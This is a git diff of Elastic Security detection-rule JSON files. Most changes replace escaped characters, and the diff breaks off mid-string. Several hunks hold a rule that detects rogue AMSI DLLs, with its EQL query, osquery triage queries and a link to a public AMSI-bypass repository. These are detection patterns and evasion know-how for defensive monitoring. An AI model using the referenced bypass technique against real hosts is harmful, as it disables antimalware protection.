diff --git a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_106.json b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_106.json
index 9817c3e244e..55a2d84bd64 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa01341d-6662-426b-9d0c-6d81e33c8a9d_106.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 47,
 "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_1.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_1.json
index e4ef3b492d4..e1c8c1b8e04 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_1.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_2.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_2.json
index 826650603b5..12e49a1e33c 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_2.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_3.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_3.json
index 996bca81c4c..1cc9d438c63 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_3.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_4.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_4.json
index 563f6b534f4..5084d38bf3f 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_4.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_5.json b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_5.json
index ef721bcc8e9..6c1b24af4b0 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa210b61-b627-4e5e-86f4-17e8270656ab_5.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_1.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_1.json
index 958158adb82..d4a211991cb 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_1.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -96,7 +96,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_2.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_2.json
index c4e153706c7..285c9a685fe 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_2.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -101,7 +101,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_3.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_3.json
index 1e7458022b1..a9905581875 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_3.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -101,7 +101,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_4.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_4.json
index cc6399b4216..d2e80d2fa92 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_4.json
@@ -80,7 +80,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -102,7 +102,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_5.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_5.json
index e02c63fe2c0..f2e01bb8b5e 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_5.json
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -103,7 +103,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_6.json b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_6.json
index 69610812a55..21ffc2e0a4a 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa3a59dc-33c3-43bf-80a9-e8437a922c7f_6.json
@@ -81,7 +81,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -103,7 +103,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_2.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_2.json
index 3100d1c72da..796562dcd32 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_2.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This modification should not happen legitimately. 
Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. 
AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This modification should not happen legitimately. 
Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribuition\\\\Download\\\\*\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
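Review bot: The exclusion list in the `query` context line of this hunk spells the path `?:\\Windows\\SoftwareDistribuition\\Download\\*`, which presumably was meant to cover the Windows Update download directory `SoftwareDistribution`; as written the pattern should never match a real path, so that exclusion is dead and file events from the intended directory still reach the rule. Correcting the spelling to `"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*"` would make the exclusion effective while keeping it as narrow as it is now. The versioned filename suggests these JSON files are generated from the rule source, so the correction belongs upstream rather than in this artifact. The same query line appears unchanged in the fa488440-04cc-41d7-9279-539387bf2a17_3 hunk further down this page.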
diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_3.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_3.json
index e803d354910..bda3d18adc4 100644
--- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_3.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON 
services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. 
AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All 
Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribuition\\\\Download\\\\*\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_4.json b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_4.json index daa2327e145..bce17d45e1e 100644 --- a/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_4.json +++ b/packages/security_detection_engine/kibana/security_rule/fa488440-04cc-41d7-9279-539387bf2a17_4.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Antimalware Scan Interface DLL", - "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON 
services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Antimalware Scan Interface DLL\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. 
AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nAttackers might copy a rogue AMSI DLL to an unusual location to prevent the process from loading the legitimate module, achieving a bypass to execute malicious code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry 